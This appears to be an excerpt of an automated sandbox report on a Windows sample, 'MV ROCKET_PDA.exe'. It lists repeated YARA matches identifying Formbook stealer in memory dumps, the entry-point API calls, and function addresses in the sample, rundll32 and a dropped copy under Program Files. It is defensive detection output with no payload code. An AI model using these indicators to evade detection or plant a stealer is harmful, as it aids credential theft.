          Source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,39_2_0040312A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_004063540_2_00406354
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_004048020_2_00404802
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00406B2B0_2_00406B2B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45B870_2_72E45B87
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45B780_2_72E45B78
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041D0FF1_2_0041D0FF
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041C9711_2_0041C971
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041D2631_2_0041D263
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00408C901_2_00408C90
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041C52D1_2_0041C52D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00402D881_2_00402D88
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041BEBC1_2_0041BEBC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A01_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B720A81_2_00B720A8
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABB0901_2_00ABB090
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B728EC1_2_00B728EC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7E8241_2_00B7E824
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B610021_2_00B61002
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC41201_2_00AC4120
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAF9001_2_00AAF900
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B722AE1_2_00B722AE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5FA2B1_2_00B5FA2B
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADEBB01_2_00ADEBB0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6DBD21_2_00B6DBD2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B603DA1_2_00B603DA
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B72B281_2_00B72B28
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAB401_2_00ACAB40
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB841F1_2_00AB841F
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6D4661_2_00B6D466
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD25811_2_00AD2581
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABD5E01_2_00ABD5E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B725DD1_2_00B725DD
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA0D201_2_00AA0D20
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B72D071_2_00B72D07
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B71D551_2_00B71D55
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B72EF71_2_00B72EF7
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC6E301_2_00AC6E30
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6D6161_2_00B6D616
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B71FF11_2_00B71FF1
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7DFCE1_2_00B7DFCE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041D0FF1_1_0041D0FF
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041C9711_1_0041C971
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041D2631_1_0041D263
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05330D2013_2_05330D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05401D5513_2_05401D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535412013_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533F90013_2_0533F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05402D0713_2_05402D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054025DD13_2_054025DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536258113_2_05362581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534D5E013_2_0534D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534841F13_2_0534841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F100213_2_053F1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FD46613_2_053FD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A013_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534B09013_2_0534B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054028EC13_2_054028EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054020A813_2_054020A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05402B2813_2_05402B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536EBB013_2_0536EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05401FF113_2_05401FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FDBD213_2_053FDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05356E3013_2_05356E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05402EF713_2_05402EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054022AE13_2_054022AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106C97113_2_0106C971
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106D0FF13_2_0106D0FF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106D26313_2_0106D263
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01052D8813_2_01052D88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01052D9013_2_01052D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01058C9013_2_01058C90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01052FB013_2_01052FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106BEBC13_2_0106BEBC
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B5B8737_2_702B5B87
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B5B7837_2_702B5B78
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A120A038_2_00A120A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB20A838_2_00AB20A8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009FB09038_2_009FB090
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB28EC38_2_00AB28EC
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA60F538_2_00AA60F5
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00ABE82438_2_00ABE824
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0A83038_2_00A0A830
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009E680038_2_009E6800
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA100238_2_00AA1002
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A1701D38_2_00A1701D
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A099BF38_2_00A099BF
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0299038_2_00A02990
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009FC1C038_2_009FC1C0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0412038_2_00A04120
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009EF90038_2_009EF900
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB32A938_2_00AB32A9
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB22AE38_2_00AB22AE
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA4AEF38_2_00AA4AEF
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AAE2C538_2_00AAE2C5
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A9FA2B38_2_00A9FA2B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0B23638_2_00A0B236
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA5A4F38_2_00AA5A4F
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A1EBB038_2_00A1EBB0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A8EB8A38_2_00A8EB8A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A1138B38_2_00A1138B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0EB9A38_2_00A0EB9A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A923E338_2_00A923E3
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A38BE838_2_00A38BE8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA03DA38_2_00AA03DA
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AADBD238_2_00AADBD2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A1ABD838_2_00A1ABD8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB2B2838_2_00AB2B28
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0A30938_2_00A0A309
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA231B38_2_00AA231B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0336038_2_00A03360
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0AB4038_2_00A0AB40
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A8CB4F38_2_00A8CB4F
